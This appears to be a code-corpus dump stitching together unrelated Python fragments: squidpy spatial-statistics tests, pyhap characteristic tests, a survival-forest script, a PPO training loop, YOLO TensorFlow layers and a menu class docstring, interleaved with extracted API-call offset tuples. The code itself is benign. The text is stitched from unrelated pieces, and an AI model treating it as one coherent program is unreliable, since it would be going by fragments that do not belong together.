assert dummy_adata.uns[MORAN_K].columns.shape == (4,)
# test highly variable
assert dummy_adata.uns[MORAN_K].shape != df.shape
# assert idx are sorted and contain same elements
assert not np.array_equal(idx_df, idx_adata)
np.testing.assert_array_equal(sorted(idx_df), sorted(idx_adata))
# check parallel gives same results
with pytest.raises(AssertionError, match=r'.*\(column name="pval_sim"\) are different.*'):
# because the seeds will be different, we don't expect the pval_sim values to be the same
assert_frame_equal(df, df_parallel)
@pytest.mark.parametrize("n_jobs", [1, 2])
def test_moran_reproducibility(dummy_adata: AnnData, n_jobs: int):
"""Check moran reproducibility results."""
moran(dummy_adata)
dummy_adata.var["highly_variable"] = np.random.choice([True, False], size=dummy_adata.var_names.shape)
# seed will work only when multiprocessing/loky
df_1 = moran(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)
df_2 = moran(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)
idx_df = df_1.index.values
idx_adata = dummy_adata[:, dummy_adata.var.highly_variable.values].var_names.values
assert MORAN_K in dummy_adata.uns.keys()
# assert fdr correction in adata.uns
assert "pval_sim_fdr_bh" in dummy_adata.uns[MORAN_K]
assert dummy_adata.uns[MORAN_K].columns.shape == (4,)
# test highly variable
assert dummy_adata.uns[MORAN_K].shape != df_1.shape
# assert idx are sorted and contain same elements
assert not np.array_equal(idx_df, idx_adata)
np.testing.assert_array_equal(sorted(idx_df), sorted(idx_adata))
# check parallel gives same results
assert_frame_equal(df_1, df_2)
def test_co_occurrence(adata: AnnData):
"""
check ripley score and shape
"""
co_occurrence(adata, cluster_key="leiden")
# assert occurrence in adata.uns
assert "leiden_co_occurrence" in adata.uns.keys()
assert "occ" in adata.uns["leiden_co_occurrence"].keys()
assert "interval" in adata.uns["leiden_co_occurrence"].keys()
# assert shapes
arr = adata.uns["leiden_co_occurrence"]["occ"]
assert arr.ndim == 3
assert arr.shape[2] == 49
assert arr.shape[1] == arr.shape[0] == adata.obs["leiden"].unique().shape[0]
# @pytest.mark.parametrize(("ys", "xs"), [(10, 10), (None, None), (10, 20)])
@pytest.mark.parametrize(("n_jobs", "n_splits"), [(1, 2), (2, 2)])
def test_co_occurrence_reproducibility(adata: AnnData, n_jobs: int, n_splits: int):
"""Check co_occurrence reproducibility results."""
arr_1, interval_1 = co_occurrence(adata, cluster_key="leiden", copy=True, n_jobs=n_jobs, n_splits=n_splits)
arr_2, interval_2 = co_occurrence(adata, cluster_key="leiden", copy=True, n_jobs=n_jobs, n_splits=n_splits)
np.testing.assert_array_equal(sorted(interval_1), sorted(interval_2))
np.testing.assert_allclose(arr_1, arr_2)
| [
"pandas.testing.assert_frame_equal",
"squidpy.gr.co_occurrence",
"numpy.testing.assert_allclose",
"pytest.raises",
"squidpy.gr.ripley_k",
"numpy.random.choice",
"numpy.array_equal",
"pytest.mark.parametrize",
"squidpy.gr.moran"
] | [((1825, 1866), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""n_jobs"""', '[1, 2]'], {}), "('n_jobs', [1, 2])\n", (1848, 1866), False, 'import pytest\n'), ((3614, 3679), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('n_jobs', 'n_splits')", '[(1, 2), (2, 2)]'], {}), "(('n_jobs', 'n_splits'), [(1, 2), (2, 2)])\n", (3637, 3679), False, 'import pytest\n'), ((265, 302), 'squidpy.gr.ripley_k', 'ripley_k', (['adata'], {'cluster_key': '"""leiden"""'}), "(adata, cluster_key='leiden')\n", (273, 302), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((738, 756), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {}), '(dummy_adata)\n', (743, 756), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((798, 863), 'numpy.random.choice', 'np.random.choice', (['[True, False]'], {'size': 'dummy_adata.var_names.shape'}), '([True, False], size=dummy_adata.var_names.shape)\n', (814, 863), True, 'import numpy as np\n'), ((873, 933), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': '(1)', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=1, seed=42, n_perms=50)\n', (878, 933), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((952, 1012), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': '(2)', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=2, seed=42, n_perms=50)\n', (957, 1012), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((1985, 2003), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {}), '(dummy_adata)\n', (1990, 2003), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((2045, 2110), 'numpy.random.choice', 'np.random.choice', (['[True, False]'], {'size': 'dummy_adata.var_names.shape'}), '([True, False], size=dummy_adata.var_names.shape)\n', (2061, 2110), True, 'import numpy as np\n'), ((2174, 2239), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': 'n_jobs', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)\n', (2179, 2239), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((2251, 2316), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': 'n_jobs', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)\n', (2256, 2316), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((2938, 2968), 'pandas.testing.assert_frame_equal', 'assert_frame_equal', (['df_1', 'df_2'], {}), '(df_1, df_2)\n', (2956, 2968), False, 'from pandas.testing import assert_frame_equal\n'), ((3064, 3106), 'squidpy.gr.co_occurrence', 'co_occurrence', (['adata'], {'cluster_key': '"""leiden"""'}), "(adata, cluster_key='leiden')\n", (3077, 3106), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((3843, 3934), 'squidpy.gr.co_occurrence', 'co_occurrence', (['adata'], {'cluster_key': '"""leiden"""', 'copy': '(True)', 'n_jobs': 'n_jobs', 'n_splits': 'n_splits'}), "(adata, cluster_key='leiden', copy=True, n_jobs=n_jobs,\n n_splits=n_splits)\n", (3856, 3934), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((3955, 4046), 'squidpy.gr.co_occurrence', 'co_occurrence', (['adata'], {'cluster_key': '"""leiden"""', 'copy': '(True)', 'n_jobs': 'n_jobs', 'n_splits': 'n_splits'}), "(adata, cluster_key='leiden', copy=True, n_jobs=n_jobs,\n n_splits=n_splits)\n", (3968, 4046), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((4122, 4162), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['arr_1', 'arr_2'], {}), '(arr_1, arr_2)\n', (4148, 4162), True, 'import numpy as np\n'), ((1442, 1475), 'numpy.array_equal', 'np.array_equal', (['idx_df', 'idx_adata'], {}), '(idx_df, idx_adata)\n', (1456, 1475), True, 'import numpy as np\n'), ((1594, 1684), 'pytest.raises', 'pytest.raises', (['AssertionError'], {'match': '""".*\\\\(column name="pval_sim"\\\\) are different.*"""'}), '(AssertionError, match=\n \'.*\\\\(column name="pval_sim"\\\\) are different.*\')\n', (1607, 1684), False, 'import pytest\n'), ((1786, 1821), 'pandas.testing.assert_frame_equal', 'assert_frame_equal', (['df', 'df_parallel'], {}), '(df, df_parallel)\n', (1804, 1821), False, 'from pandas.testing import assert_frame_equal\n'), ((2791, 2824), 'numpy.array_equal', 'np.array_equal', (['idx_df', 'idx_adata'], {}), '(idx_df, idx_adata)\n', (2805, 2824), True, 'import numpy as np\n')] |
"""
Tests for pyhap.characteristic
"""
import uuid
from unittest import mock
import pytest
import pyhap.characteristic as characteristic
from pyhap.characteristic import Characteristic
PROPERTIES = {
"Format": characteristic.HAP_FORMAT.INT,
"Permissions": [characteristic.HAP_PERMISSIONS.READ]
}
def get_char(props, valid=None, min_value=None, max_value=None):
if valid is not None:
props["ValidValues"] = valid
if min_value is not None:
props["minValue"] = min_value
if max_value is not None:
props["maxValue"] = max_value
c = Characteristic(display_name="Test Char",
type_id=uuid.uuid1(),
properties=props)
return c
def test_default_value():
char = get_char(PROPERTIES.copy())
assert (characteristic.HAP_FORMAT.DEFAULT[PROPERTIES["Format"]]
== char.value)
def test_default_valid_value():
valid_values = {"foo": 2, "bar": 3}
char = get_char(PROPERTIES.copy(), valid=valid_values)
assert char.value in valid_values.values()
def test_set_value():
char = get_char(PROPERTIES.copy())
new_value = 3
char.set_value(new_value)
assert char.value == new_value
def test_set_value_valid_values():
valid_values = {"foo": 2, "bar": 3, }
char = get_char(PROPERTIES.copy(), valid=valid_values)
with pytest.raises(ValueError):
char.set_value(4)
def test_set_value_callback_toggle():
char = get_char(PROPERTIES.copy())
char.setter_callback = mock.Mock()
char.set_value(3, should_callback=False)
assert not char.setter_callback.called
char.set_value(3, should_callback=True)
assert char.setter_callback.called
def test_override_properties_properties():
new_properties = {'minValue': 10, 'maxValue': 20, 'step': 1}
char = get_char(PROPERTIES.copy(), min_value=0, max_value=1)
char.override_properties(properties=new_properties)
assert char.properties['minValue'] == new_properties['minValue']
assert char.properties['maxValue'] == new_properties['maxValue']
assert char.properties['step'] == new_properties['step']
def test_override_properties_valid_values():
new_valid_values = {'foo2': 2, 'bar2': 3}
char = get_char(PROPERTIES.copy(), valid={'foo': 1, 'bar': 2})
char.override_properties(valid_values=new_valid_values)
assert char.properties['ValidValues'] == new_valid_values
def test_get_hap_value():
max_value = 5
raw_value = 6
char = get_char(PROPERTIES.copy(), max_value=max_value)
char.set_value(raw_value, should_notify=False)
assert char.value == raw_value
assert char.get_hap_value() == max_value
def test_notify():
char = get_char(PROPERTIES.copy())
broker_mock = mock.Mock()
char.broker = broker_mock
notify_value = 3
expected = {
"type_id": char.type_id,
"value": notify_value,
}
char.value = notify_value
char.notify()
assert broker_mock.publish.called
broker_mock.publish.assert_called_with(expected, char)
def test_notify_except_no_broker():
char = get_char(PROPERTIES.copy())
with pytest.raises(characteristic.NotConfiguredError):
char.notify()
| [
"uuid.uuid1",
"pytest.raises",
"unittest.mock.Mock"
] | [((1509, 1520), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (1518, 1520), False, 'from unittest import mock\n'), ((2733, 2744), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (2742, 2744), False, 'from unittest import mock\n'), ((1351, 1376), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1364, 1376), False, 'import pytest\n'), ((3113, 3161), 'pytest.raises', 'pytest.raises', (['characteristic.NotConfiguredError'], {}), '(characteristic.NotConfiguredError)\n', (3126, 3161), False, 'import pytest\n'), ((652, 664), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (662, 664), False, 'import uuid\n')] |
from random_survival_forest import RandomSurvivalForest, concordance_index
from lifelines import datasets
from sklearn.model_selection import train_test_split
import time
rossi = datasets.load_rossi()
# Attention: duration column must be index 0, event column index 1 in y
y = rossi.loc[:, ["arrest", "week"]]
X = rossi.drop(["arrest", "week"], axis=1)
X, X_test, y, y_test = train_test_split(X, y, test_size=0.25, random_state=10)
print("RSF")
start_time = time.time()
rsf = RandomSurvivalForest(n_estimators=20, n_jobs=-1, min_leaf=10)
rsf = rsf.fit(X, y)
print("--- %s seconds ---" % (time.time() - start_time))
y_pred = rsf.predict(X_test)
c_val = concordance_index(y_time=y_test["week"], y_pred=y_pred, y_event=y_test["arrest"])
print("C-index", round(c_val, 3))
| [
"random_survival_forest.concordance_index",
"sklearn.model_selection.train_test_split",
"time.time",
"random_survival_forest.RandomSurvivalForest",
"lifelines.datasets.load_rossi"
] | [((180, 201), 'lifelines.datasets.load_rossi', 'datasets.load_rossi', ([], {}), '()\n', (199, 201), False, 'from lifelines import datasets\n'), ((377, 432), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.25)', 'random_state': '(10)'}), '(X, y, test_size=0.25, random_state=10)\n', (393, 432), False, 'from sklearn.model_selection import train_test_split\n'), ((460, 471), 'time.time', 'time.time', ([], {}), '()\n', (469, 471), False, 'import time\n'), ((478, 539), 'random_survival_forest.RandomSurvivalForest', 'RandomSurvivalForest', ([], {'n_estimators': '(20)', 'n_jobs': '(-1)', 'min_leaf': '(10)'}), '(n_estimators=20, n_jobs=-1, min_leaf=10)\n', (498, 539), False, 'from random_survival_forest import RandomSurvivalForest, concordance_index\n'), ((654, 740), 'random_survival_forest.concordance_index', 'concordance_index', ([], {'y_time': "y_test['week']", 'y_pred': 'y_pred', 'y_event': "y_test['arrest']"}), "(y_time=y_test['week'], y_pred=y_pred, y_event=y_test[\n 'arrest'])\n", (671, 740), False, 'from random_survival_forest import RandomSurvivalForest, concordance_index\n'), ((590, 601), 'time.time', 'time.time', ([], {}), '()\n', (599, 601), False, 'import time\n')] |
import gym
import numpy as np
import torch
import torch.optim as optim
from utils_main import make_env, save_files
from neural_network import ActorCritic
from ppo_method import ppo
from common.multiprocessing_env import SubprocVecEnv
from itertools import count
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
num_envs = 2
env_name = "CustomEnv-v0"
envs = [make_env(env_name) for i in range(num_envs)]
envs = SubprocVecEnv(envs)
num_inputs = envs.observation_space.shape[0]
num_outputs = envs.action_space.shape[0]
# Hyper params:
hidden_size = 400
lr = 3e-6
num_steps = 20
mini_batch_size = 5
ppo_epochs = 4
threshold_reward = -0.01
model = ActorCritic(num_inputs, num_outputs, hidden_size).to(device)
env = gym.make(env_name)
my_ppo = ppo(model, env)
optimizer = optim.Adam(model.parameters(), lr=lr)
max_frames = 1_500_0000
frame_idx = 0
test_rewards = []
save_iteration = 1000
model_save_iteration = 1000
state = envs.reset()
early_stop = False
def trch_ft_device(input, device):
output = torch.FloatTensor(input).to(device)
return output
saver_model = save_files()
while frame_idx < max_frames and not early_stop:
log_probs = []
values = []
states = []
actions = []
rewards = []
masks = []
entropy = 0
for _ in range(num_steps):
state = trch_ft_device(state, device)
dist, value = model(state)
action = dist.sample()
next_state, reward, done, _ = envs.step(action.cpu().numpy())
log_prob = dist.log_prob(action)
entropy += dist.entropy().mean()
# appending
log_probs.append(log_prob)
values.append(value)
rewards.append(torch.FloatTensor(reward).unsqueeze(1).to(device))
masks.append(torch.FloatTensor(1 - done).unsqueeze(1).to(device))
states.append(state)
actions.append(action)
# next iteration init.
state = next_state
frame_idx += 1
if frame_idx % save_iteration == 0:
test_reward = np.mean([my_ppo.test_env() for _ in range(num_envs)])
test_rewards.append(test_reward)
# plot(frame_idx, test_rewards)
if test_reward > threshold_reward:
early_stop = True
if frame_idx % model_save_iteration == 0:
saver_model.model_save(model)
next_state = trch_ft_device(next_state, device)
_, next_value = model(next_state)
returns = my_ppo.compute_gae(next_value, rewards, masks, values)
returns = torch.cat(returns).detach()
log_probs = torch.cat(log_probs).detach()
values = torch.cat(values).detach()
states = torch.cat(states)
actions = torch.cat(actions)
advantage = returns - values
my_ppo.ppo_update(ppo_epochs, mini_batch_size, states, actions, log_probs, returns, advantage, optimizer)
max_expert_num = 50000
num_steps = 0
expert_traj = []
# building an episode based on the current model.
for i_episode in count():
state = env.reset()
done = False
total_reward = 0
while not done:
state = torch.FloatTensor(state).unsqueeze(0).to(device)
dist, _ = model(state)
action = dist.sample().cpu().numpy()[0]
next_state, reward, done, _ = env.step(action)
state = next_state
total_reward += reward
expert_traj.append(np.hstack([state, action]))
num_steps += 1
print("episode:", i_episode, "reward:", total_reward)
if num_steps >= max_expert_num:
break
expert_traj = np.stack(expert_traj)
print()
print(expert_traj.shape)
print()
np.save("expert_traj.npy", expert_traj)
| [
"numpy.stack",
"ppo_method.ppo",
"utils_main.save_files",
"gym.make",
"common.multiprocessing_env.SubprocVecEnv",
"numpy.save",
"neural_network.ActorCritic",
"torch.FloatTensor",
"torch.cat",
"itertools.count",
"numpy.hstack",
"torch.cuda.is_available",
"torch.device",
"utils_main.make_env"
] | [((274, 299), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (297, 299), False, 'import torch\n'), ((309, 352), 'torch.device', 'torch.device', (["('cuda' if use_cuda else 'cpu')"], {}), "('cuda' if use_cuda else 'cpu')\n", (321, 352), False, 'import torch\n'), ((456, 475), 'common.multiprocessing_env.SubprocVecEnv', 'SubprocVecEnv', (['envs'], {}), '(envs)\n', (469, 475), False, 'from common.multiprocessing_env import SubprocVecEnv\n'), ((760, 778), 'gym.make', 'gym.make', (['env_name'], {}), '(env_name)\n', (768, 778), False, 'import gym\n'), ((789, 804), 'ppo_method.ppo', 'ppo', (['model', 'env'], {}), '(model, env)\n', (792, 804), False, 'from ppo_method import ppo\n'), ((1121, 1133), 'utils_main.save_files', 'save_files', ([], {}), '()\n', (1131, 1133), False, 'from utils_main import make_env, save_files\n'), ((2985, 2992), 'itertools.count', 'count', ([], {}), '()\n', (2990, 2992), False, 'from itertools import count\n'), ((3537, 3558), 'numpy.stack', 'np.stack', (['expert_traj'], {}), '(expert_traj)\n', (3545, 3558), True, 'import numpy as np\n'), ((3600, 3639), 'numpy.save', 'np.save', (['"""expert_traj.npy"""', 'expert_traj'], {}), "('expert_traj.npy', expert_traj)\n", (3607, 3639), True, 'import numpy as np\n'), ((404, 422), 'utils_main.make_env', 'make_env', (['env_name'], {}), '(env_name)\n', (412, 422), False, 'from utils_main import make_env, save_files\n'), ((2668, 2685), 'torch.cat', 'torch.cat', (['states'], {}), '(states)\n', (2677, 2685), False, 'import torch\n'), ((2700, 2718), 'torch.cat', 'torch.cat', (['actions'], {}), '(actions)\n', (2709, 2718), False, 'import torch\n'), ((693, 742), 'neural_network.ActorCritic', 'ActorCritic', (['num_inputs', 'num_outputs', 'hidden_size'], {}), '(num_inputs, num_outputs, hidden_size)\n', (704, 742), False, 'from neural_network import ActorCritic\n'), ((1051, 1075), 'torch.FloatTensor', 'torch.FloatTensor', (['input'], {}), '(input)\n', (1068, 1075), False, 'import torch\n'), ((2541, 2559), 'torch.cat', 'torch.cat', (['returns'], {}), '(returns)\n', (2550, 2559), False, 'import torch\n'), ((2585, 2605), 'torch.cat', 'torch.cat', (['log_probs'], {}), '(log_probs)\n', (2594, 2605), False, 'import torch\n'), ((2628, 2645), 'torch.cat', 'torch.cat', (['values'], {}), '(values)\n', (2637, 2645), False, 'import torch\n'), ((3361, 3387), 'numpy.hstack', 'np.hstack', (['[state, action]'], {}), '([state, action])\n', (3370, 3387), True, 'import numpy as np\n'), ((3093, 3117), 'torch.FloatTensor', 'torch.FloatTensor', (['state'], {}), '(state)\n', (3110, 3117), False, 'import torch\n'), ((1706, 1731), 'torch.FloatTensor', 'torch.FloatTensor', (['reward'], {}), '(reward)\n', (1723, 1731), False, 'import torch\n'), ((1778, 1805), 'torch.FloatTensor', 'torch.FloatTensor', (['(1 - done)'], {}), '(1 - done)\n', (1795, 1805), False, 'import torch\n')] |
import tensorflow as tf
from .config import cfg
class YoloHead(tf.keras.layers.Layer):
def __init__(self, grid_size, classes, strides, anchors, xyscale, i):
super().__init__()
self.grid_size = grid_size
self.classes = classes
self.strides = strides
self.anchors = anchors
self.xyscale = xyscale
self.i = i
def call(self, feature_map):
batch_size = tf.shape(feature_map)[0]
conv_output = tf.reshape(
feature_map,
(batch_size, self.grid_size, self.grid_size, 3, 5 + self.classes),
)
bbox_xy, bbox_wh, detection_conf, classes_prob = tf.split(
conv_output, (2, 2, 1, self.classes), axis=-1
)
xy_grid = tf.meshgrid(
tf.range(self.grid_size), tf.range(self.grid_size)
)
xy_grid = tf.expand_dims(tf.stack(xy_grid, axis=-1), axis=2)
xy_grid = tf.tile(
tf.expand_dims(xy_grid, axis=0),
[batch_size, 1, 1, 3, 1],
)
xy_grid = tf.cast(xy_grid, tf.float32)
bbox_xy_sigmoid = tf.sigmoid(bbox_xy)
detection_conf_sigmoid = tf.sigmoid(detection_conf)
classes_prob_sigmoid = tf.sigmoid(classes_prob)
prediction_xy = (
(bbox_xy_sigmoid * self.xyscale[self.i])
- 0.5 * (self.xyscale[self.i] - 1)
+ xy_grid
) * self.strides[self.i]
prediction_wh = tf.exp(bbox_wh) * self.anchors[self.i]
prediction_xywh = tf.concat([prediction_xy, prediction_wh], axis=-1)
prediction_prob = detection_conf_sigmoid * classes_prob_sigmoid
prediction_xywh = tf.reshape(prediction_xywh, (batch_size, -1, 4))
prediction_prob = tf.reshape(
prediction_prob, (batch_size, -1, self.classes)
)
return prediction_xywh, prediction_prob
class FilterLayer(tf.keras.layers.Layer):
def __init__(self, input_size, score_threshold=0.4):
super().__init__()
self.input_size = input_size
self.score_threshold = score_threshold
def call(self, bounding_boxes, scores):
input_size = self.input_size
score_threshold = self.score_threshold
bounding_boxes = tf.concat(bounding_boxes, axis=1)
scores = tf.concat(scores, axis=1)
scores_max = tf.math.reduce_max(scores, axis=-1)
mask = scores_max >= score_threshold
class_boxes = tf.boolean_mask(bounding_boxes, mask)
pred_conf = tf.boolean_mask(scores, mask)
class_boxes = tf.reshape(
class_boxes, [tf.shape(scores)[0], -1, tf.shape(class_boxes)[-1]]
)
pred_conf = tf.reshape(
pred_conf, [tf.shape(scores)[0], -1, tf.shape(pred_conf)[-1]]
)
box_xy, box_wh = tf.split(class_boxes, (2, 2), axis=-1)
input_size = tf.cast(input_size, dtype=tf.float32)
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
box_mins = (box_yx - (box_hw / 2.0)) / input_size
box_maxes = (box_yx + (box_hw / 2.0)) / input_size
boxes = tf.concat(
[
box_mins[..., 0:1],
box_mins[..., 1:2],
box_maxes[..., 0:1],
box_maxes[..., 1:2],
],
axis=-1,
)
predictions = tf.concat([boxes, pred_conf], axis=-1)
return predictions
def dense_prediction(feature_maps, classes, tiny=False):
bbox_tensors = []
prob_tensors = []
if tiny:
yolo_head_1 = YoloHead(
cfg.INPUT_SIZE // 16,
classes,
cfg.STRIDES_TINY,
cfg.ANCHORS_TINY,
cfg.XYSCALE_TINY,
0,
)(feature_maps[0])
bbox_tensors.append(yolo_head_1[0])
prob_tensors.append(yolo_head_1[1])
yolo_head_2 = YoloHead(
cfg.INPUT_SIZE // 32,
classes,
cfg.STRIDES_TINY,
cfg.ANCHORS_TINY,
cfg.XYSCALE_TINY,
1,
)(feature_maps[1])
bbox_tensors.append(yolo_head_2[0])
prob_tensors.append(yolo_head_2[1])
else:
yolo_head_1 = YoloHead(
cfg.INPUT_SIZE // 8,
classes,
cfg.STRIDES,
cfg.ANCHORS,
cfg.XYSCALE,
0,
)(feature_maps[0])
bbox_tensors.append(yolo_head_1[0])
prob_tensors.append(yolo_head_1[1])
yolo_head_2 = YoloHead(
cfg.INPUT_SIZE // 16,
classes,
cfg.STRIDES,
cfg.ANCHORS,
cfg.XYSCALE,
1,
)(feature_maps[1])
bbox_tensors.append(yolo_head_2[0])
prob_tensors.append(yolo_head_2[1])
yolo_head_3 = YoloHead(
cfg.INPUT_SIZE // 32,
classes,
cfg.STRIDES,
cfg.ANCHORS,
cfg.XYSCALE,
2,
)(feature_maps[2])
bbox_tensors.append(yolo_head_3[0])
prob_tensors.append(yolo_head_3[1])
predictions = FilterLayer(
input_size=tf.constant([cfg.INPUT_SIZE, cfg.INPUT_SIZE]),
score_threshold=0.2
)(bbox_tensors, prob_tensors)
return predictions
| [
"tensorflow.range",
"tensorflow.math.reduce_max",
"tensorflow.reshape",
"tensorflow.concat",
"tensorflow.constant",
"tensorflow.stack",
"tensorflow.cast",
"tensorflow.shape",
"tensorflow.exp",
"tensorflow.boolean_mask",
"tensorflow.split",
"tensorflow.sigmoid",
"tensorflow.expand_dims"
] | [((470, 564), 'tensorflow.reshape', 'tf.reshape', (['feature_map', '(batch_size, self.grid_size, self.grid_size, 3, 5 + self.classes)'], {}), '(feature_map, (batch_size, self.grid_size, self.grid_size, 3, 5 +\n self.classes))\n', (480, 564), True, 'import tensorflow as tf\n'), ((654, 709), 'tensorflow.split', 'tf.split', (['conv_output', '(2, 2, 1, self.classes)'], {'axis': '(-1)'}), '(conv_output, (2, 2, 1, self.classes), axis=-1)\n', (662, 709), True, 'import tensorflow as tf\n'), ((1044, 1072), 'tensorflow.cast', 'tf.cast', (['xy_grid', 'tf.float32'], {}), '(xy_grid, tf.float32)\n', (1051, 1072), True, 'import tensorflow as tf\n'), ((1100, 1119), 'tensorflow.sigmoid', 'tf.sigmoid', (['bbox_xy'], {}), '(bbox_xy)\n', (1110, 1119), True, 'import tensorflow as tf\n'), ((1153, 1179), 'tensorflow.sigmoid', 'tf.sigmoid', (['detection_conf'], {}), '(detection_conf)\n', (1163, 1179), True, 'import tensorflow as tf\n'), ((1211, 1235), 'tensorflow.sigmoid', 'tf.sigmoid', (['classes_prob'], {}), '(classes_prob)\n', (1221, 1235), True, 'import tensorflow as tf\n'), ((1508, 1558), 'tensorflow.concat', 'tf.concat', (['[prediction_xy, prediction_wh]'], {'axis': '(-1)'}), '([prediction_xy, prediction_wh], axis=-1)\n', (1517, 1558), True, 'import tensorflow as tf\n'), ((1658, 1706), 'tensorflow.reshape', 'tf.reshape', (['prediction_xywh', '(batch_size, -1, 4)'], {}), '(prediction_xywh, (batch_size, -1, 4))\n', (1668, 1706), True, 'import tensorflow as tf\n'), ((1733, 1792), 'tensorflow.reshape', 'tf.reshape', (['prediction_prob', '(batch_size, -1, self.classes)'], {}), '(prediction_prob, (batch_size, -1, self.classes))\n', (1743, 1792), True, 'import tensorflow as tf\n'), ((2230, 2263), 'tensorflow.concat', 'tf.concat', (['bounding_boxes'], {'axis': '(1)'}), '(bounding_boxes, axis=1)\n', (2239, 2263), True, 'import tensorflow as tf\n'), ((2281, 2306), 'tensorflow.concat', 'tf.concat', (['scores'], {'axis': '(1)'}), '(scores, axis=1)\n', (2290, 2306), True, 'import tensorflow as tf\n'), ((2328, 2363), 'tensorflow.math.reduce_max', 'tf.math.reduce_max', (['scores'], {'axis': '(-1)'}), '(scores, axis=-1)\n', (2346, 2363), True, 'import tensorflow as tf\n'), ((2432, 2469), 'tensorflow.boolean_mask', 'tf.boolean_mask', (['bounding_boxes', 'mask'], {}), '(bounding_boxes, mask)\n', (2447, 2469), True, 'import tensorflow as tf\n'), ((2490, 2519), 'tensorflow.boolean_mask', 'tf.boolean_mask', (['scores', 'mask'], {}), '(scores, mask)\n', (2505, 2519), True, 'import tensorflow as tf\n'), ((2784, 2822), 'tensorflow.split', 'tf.split', (['class_boxes', '(2, 2)'], {'axis': '(-1)'}), '(class_boxes, (2, 2), axis=-1)\n', (2792, 2822), True, 'import tensorflow as tf\n'), ((2845, 2882), 'tensorflow.cast', 'tf.cast', (['input_size'], {'dtype': 'tf.float32'}), '(input_size, dtype=tf.float32)\n', (2852, 2882), True, 'import tensorflow as tf\n'), ((3088, 3194), 'tensorflow.concat', 'tf.concat', (['[box_mins[..., 0:1], box_mins[..., 1:2], box_maxes[..., 0:1], box_maxes[...,\n 1:2]]'], {'axis': '(-1)'}), '([box_mins[..., 0:1], box_mins[..., 1:2], box_maxes[..., 0:1],\n box_maxes[..., 1:2]], axis=-1)\n', (3097, 3194), True, 'import tensorflow as tf\n'), ((3328, 3366), 'tensorflow.concat', 'tf.concat', (['[boxes, pred_conf]'], {'axis': '(-1)'}), '([boxes, pred_conf], axis=-1)\n', (3337, 3366), True, 'import tensorflow as tf\n'), ((423, 444), 'tensorflow.shape', 'tf.shape', (['feature_map'], {}), '(feature_map)\n', (431, 444), True, 'import tensorflow as tf\n'), ((776, 800), 'tensorflow.range', 'tf.range', (['self.grid_size'], {}), '(self.grid_size)\n', (784, 800), True, 'import tensorflow as tf\n'), ((802, 826), 'tensorflow.range', 'tf.range', (['self.grid_size'], {}), '(self.grid_size)\n', (810, 826), True, 'import tensorflow as tf\n'), ((870, 896), 'tensorflow.stack', 'tf.stack', (['xy_grid'], {'axis': '(-1)'}), '(xy_grid, axis=-1)\n', (878, 896), True, 'import tensorflow as tf\n'), ((945, 976), 'tensorflow.expand_dims', 'tf.expand_dims', (['xy_grid'], {'axis': '(0)'}), '(xy_grid, axis=0)\n', (959, 976), True, 'import tensorflow as tf\n'), ((1442, 1457), 'tensorflow.exp', 'tf.exp', (['bbox_wh'], {}), '(bbox_wh)\n', (1448, 1457), True, 'import tensorflow as tf\n'), ((5071, 5116), 'tensorflow.constant', 'tf.constant', (['[cfg.INPUT_SIZE, cfg.INPUT_SIZE]'], {}), '([cfg.INPUT_SIZE, cfg.INPUT_SIZE])\n', (5082, 5116), True, 'import tensorflow as tf\n'), ((2580, 2596), 'tensorflow.shape', 'tf.shape', (['scores'], {}), '(scores)\n', (2588, 2596), True, 'import tensorflow as tf\n'), ((2605, 2626), 'tensorflow.shape', 'tf.shape', (['class_boxes'], {}), '(class_boxes)\n', (2613, 2626), True, 'import tensorflow as tf\n'), ((2698, 2714), 'tensorflow.shape', 'tf.shape', (['scores'], {}), '(scores)\n', (2706, 2714), True, 'import tensorflow as tf\n'), ((2723, 2742), 'tensorflow.shape', 'tf.shape', (['pred_conf'], {}), '(pred_conf)\n', (2731, 2742), True, 'import tensorflow as tf\n')] |
"""
Author: <NAME>
File: menu.py
A general class for creating menus
Parameters:
pos - (x,y) position for the top-left corner of the menu
dims - (width, height) pixels of the menu
commands - list of dictionaries specifying the button attributes
padding - (horizontal, vertical) padding between border and buttons
spacing - space in pixels between buttons
color - rgb color of the menu background (None for transparent)
borderColor - rgb color value for border
borderWidth - pixel width for the border
font - Supplied as a pygame font
orientation - "vertical" | "horizontal"
"""
import pygame
from polybius.graphics.components import Button
